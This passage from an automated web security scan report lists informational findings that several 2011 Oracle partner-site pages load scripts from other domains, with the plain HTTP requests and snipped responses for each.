http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_opn.js

Request

GET /partners/en/join-now/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=101;ecid=41070885034398193,0:1)
Date: Tue, 06 Sep 2011 16:08:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 45219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.161. http://www.oracle.com/partners/en/knowledge-zone/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/en/knowledge-zone/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_opn.js

Request

GET /partners/en/knowledge-zone/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=41070906509234942,0:1)
Date: Tue, 06 Sep 2011 16:08:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92582

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.162. http://www.oracle.com/partners/en/most-popular-resources/enablement-028916.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/en/most-popular-resources/enablement-028916.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_opn.js

Request

GET /partners/en/most-popular-resources/enablement-028916.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41070983818647173,0:1)
Date: Tue, 06 Sep 2011 16:08:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67526

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.163. http://www.oracle.com/partners/en/opn-program/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/en/opn-program/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_opn.js

Request

GET /partners/en/opn-program/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=282;ecid=35731201303394792,0:1)
Date: Tue, 06 Sep 2011 16:08:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48962

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.164. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/en/opn-program/membership-resources/business-center/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_opn.js

Request

GET /partners/en/opn-program/membership-resources/business-center/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.165. http://www.oracle.com/partners/en/opn-program/membership-resources/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/en/opn-program/membership-resources/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/APIModules_all.js
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_opn.js

Request

GET /partners/en/opn-program/membership-resources/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.166. http://www.oracle.com/partners/en/opn-program/opn-details-by-levels/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/en/opn-program/opn-details-by-levels/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_opn.js

Request

GET /partners/en/opn-program/opn-details-by-levels/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41071722553034640,0:1)
Date: Tue, 06 Sep 2011 16:08:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52841

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.167. http://www.oracle.com/partners/en/opn-program/specialize/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/en/opn-program/specialize/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/APIModules_all.js
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_opn.js

Request

GET /partners/en/opn-program/specialize/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41153606104533675,0:1)
Date: Tue, 06 Sep 2011 16:08:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63014

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/ocom/groups/public/@opnpublic/documents/webcontent/430048.css" />
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.168. http://www.oracle.com/partners/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.google.com/jsapi?key=ABQIAAAAOnnhxc5WHl2B1gcBENsogxToKgSLRNLB74Ju4XnQeN6j9STtfRRbGjgKWOot575DxC4ZOzBhwgg-OA
http://www.oracleimg.com/us/assets/metrics/ora_opn.js

Request

GET /partners/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=260;ecid=35980846277479921,0:1)
Date: Tue, 06 Sep 2011 16:08:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76516

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<td width="83%" valign="top"><script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAOnnhxc5WHl2B1gcBENsogxToKgSLRNLB74Ju4XnQeN6j9STtfRRbGjgKWOot575DxC4ZOzBhwgg-OA"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.169. http://www.oracle.com/partners/secure/development/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/development/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/development/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~DC375A69B00356BA76A5A79BEF2E4B4520E5D63F76593D54A69F99556814F4B7045556E160B8976DD36DACD09DA2BC1AFCC0323FD60011E51828471727C9C49173BB8EE2DC8BE9313FA7D1AEE35A5DA57B53E6351F1974F9657D9D36F23ADB00DC4ED19FBB023F1E3BCAACBB1F04820BA51093B60F7C9894116DA17AC31D3EACAFCA1EE5C94B9E651E683BCD92AC8B8D11D0C2B58F166899B9FE5AFF66B7FC3F1CACD1C662E7FC71BCA402DAE9DA086C21DF083444149F6E4320A345F870958F1EBCC33AEDAAC97ECA0A63B132218B60411F896CA90899CFBABDFC8DE66CB12F0D0C3792EB195A3E12CA453AB7ED23024F70DBC93EEFD739596F775FAA04CA33EDC3A0EB85846BAA31D28A4073FE6F31D0AE9ED5D55828755A363ED3D2C581C38F8FC99B79CB93544329169153545B5F
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41071864286957439,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.170. http://www.oracle.com/partners/secure/development/order-technology-software/access-software-and-support-020672.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/development/order-technology-software/access-software-and-support-020672.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/development/order-technology-software/access-software-and-support-020672.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~DC375A69B00356BA76A5A79BEF2E4B4520E5D63F76593D54A69F99556814F4B7045556E160B8976DD36DACD09DA2BC1AFCC0323FD60011E51828471727C9C49173BB8EE2DC8BE9313FA7D1AEE35A5DA57B53E6351F1974F9657D9D36F23ADB00DC4ED19FBB023F1E3BCAACBB1F04820BA51093B60F7C9894116DA17AC31D3EACAFCA1EE5C94B9E651E683BCD92AC8B8D11D0C2B58F166899B9FE5AFF66B7FC3F1CACD1C662E7FC71BCA402DAE9DA086C21DF083444149F6E4320A345F870958FACA4EDD0B61319DC85FAAD1FECD2E55DF90382C6C5E502663A74342C792BD52FEE3A12181D0CC1F1C25BB18EE3166F4FD6CDD8C5D81D19ED34F76C48FDB9B39C2611A6EA73189C0DE33CD3CC9600072DAFD8B7832384FDACC185290DE5A52EFD2DA750A654567B949572AD6AA1F092D873EB7F0187A42BD45C0DCAFC08E7DD9ED5BB95F84268B55151E658AC0F5AE0DACB097E52414E54E17B7C26E140F5E36790FD0DA82CBDEFACF1C470AE83F22DC4013EC07EAA13F8645B23ABFDBC927EFC2444B741EC14E454
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35731630800130588,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.171. http://www.oracle.com/partners/secure/development/order-technology-software/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/development/order-technology-software/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/development/order-technology-software/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~1C5206DFAC805FA1D29EBB857B430E919BD5EFB0A51C4CC83E107DA65D0C61EB86E272DF898E64E0F77C74E83BDB19105EF8A6869A4910A8A75F167FE448D7209CDFF8891C3960C421F14F6DD7CD42D1EE781D7D20DF39CD87FE80867907F83A8EF47014F79F93F096FC69B4F147A971D59B119FBFC1B8A8D4608CF9962C8A055401A3104A74103AC44B18D737DF616BAF83B097B1A6683E57DF812FF238DC37A9DD26027DBD00DD0A748EA1D46D50B0FAF45439C64BC1789D6A19D813B8DE1A4AB0FFD29C3ED30C71DE64CB83E4A6A4644E64A45B69EEF65DA824E027787FCF27853C395DDE041B533D5BDEE8AA59017F63866DF3E2B4BF3852B977497E9D288B439C3B916B4E5FF8B1FB8BC503379FA7411D88A5570CF927AC55F3A7E28F533954F4F8F312E6E16BFF4A519179606BB6A5188BE07725F3F81A6184FF99AD535FA0C55FC0F3A4CC96FCC7361F7BDD85E9A2B79A9F26466C
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41153782198195405,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.172. http://www.oracle.com/partners/secure/marketing/download-logos/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/marketing/download-logos/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/marketing/download-logos/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~C28CEDFA83A64A4A7B22E23D9F5AB37F139F27C883D085EF5D9C6E6C1D989D1BD9858913449BDD53EC410BA150AB0074D1B8F92E95FE4C13935BEC9B1C1081A063EDC6159DCB1B084DEFB33C2DADD572AEDD08FFC14D1A24464F4AC2544557946F7BDC591A3BBC035F639F854A3994E9AC45BCBB5F8D633A17FB3FAD845007959D650452C1ACDEFB2A9E0880D4F345C8B21D3380FD60F67BC493D194AED77CA9000CDBB7E7490A9B9165FCA405ED4AE8FE5126B4B743FC0FC20C4A907F341BCF0AF491F208999AC5B5431D91573105EF18BC549681E6FFA423562BD1E4D7B08BB3F60959B1C6656CFFC4E9E63344E2B121EF4E56D72E0F5C88CCD999900825F76432F0E866F8485B835BA547BC67C17334DE8EA19E75D6019C0A5BDD9AC9BF99071B3443DFC6771108DDD846AE37491F3BDD39340484CCF49358E77ED35FA051
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41153838032771023,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.173. http://www.oracle.com/partners/secure/marketing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/marketing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/marketing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~C28CEDFA83A64A4A7B22E23D9F5AB37F139F27C883D085EF5D9C6E6C1D989D1BD9858913449BDD53EC410BA150AB0074D1B8F92E95FE4C13935BEC9B1C1081A063EDC6159DCB1B084DEFB33C2DADD572AEDD08FFC14D1A24464F4AC2544557946F7BDC591A3BBC035F639F854A3994E9AC45BCBB5F8D633A17FB3FAD845007959D650452C1ACDEFB2A9E0880D4F345C8B21D3380FD60F67BC493D194AED77CA9000CDBB7E7490A9B9165FCA405ED4AE8FE5126B4B743FC0F1497222E571E789A593D2EBF47E0076527A90B1D806B92670799D03533E9DDED43DDE69257A889C53B5AA8A15AFD850DAE592662C816BEAF474F774A5EB3D66227575F0365B4A9701BDF79E0DD5C4087805CE9C90BECE4CCC96D6FBC4B94BE3F1426F3F9721584DCB9298D905CCCC6643FCDEF0019406659
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41072053265521103,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.174. http://www.oracle.com/partners/secure/marketing/marketing-and-event-kits/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/marketing/marketing-and-event-kits/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/marketing/marketing-and-event-kits/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~108F47BF14FF08DC2A24DD5CA9899740C1CBCF5098CAAD36B56DED08104D9C86A7190CEB15D57300F82996C4A74F00E4E89A1C617D0DD08003B089B204F2503F74F42739EC6259C0DA090FD799BAF98107D800313F763C8BAAC324B66AEDE362E17AF6D10649B76C34ADC009D58752984C70D6F64B4A0738F5138521D56D1B34BF955032988C61E9924AD48AE962421AC781EC83BA8DE5D3560560695B79D12C971F6B87FEDA79275C6ED825AD9D658A3E63F28AE2BC5D6A22B64E3E13D62226D60EBED439BD423B630D2854302EE91489FFC9470B0A5E108BE42964E8BB29637A84F15E6D78081F4DC07655BC4BE22BC6845C48647A216936DB9DFA2D3B55A258B9FCBF21032DF794F55C57AE143A47C27E7773F95DBCD2AFA7B1F4DF84420D74981CD96E4ADDAF1689E06499D0BDE75E6395B00B278CE2923EC6650EACDABCBE8316ED8F8C7385138D1AD269CA7BDC0121EA627EC780E1
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35731828368628804,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.175. http://www.oracle.com/partners/secure/membership/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/membership/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
